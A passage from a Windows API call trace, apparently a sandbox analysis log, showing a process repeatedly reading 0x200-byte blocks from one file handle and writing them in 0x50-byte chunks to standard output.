[0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.702] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.703] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, 
lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 
| out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.704] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.706] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.706] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 
[0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] GetFileType (hFile=0x4c) returned 0x1 [0232.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.706] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.707] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, 
lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] GetFileType (hFile=0x4c) returned 0x1 [0232.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.707] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] GetFileType (hFile=0x4c) returned 0x1 [0232.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.708] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.708] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType 
(hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] GetFileType (hFile=0x4c) returned 0x1 [0232.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.709] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.710] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] GetFileType (hFile=0x4c) returned 0x1 [0232.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.710] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, 
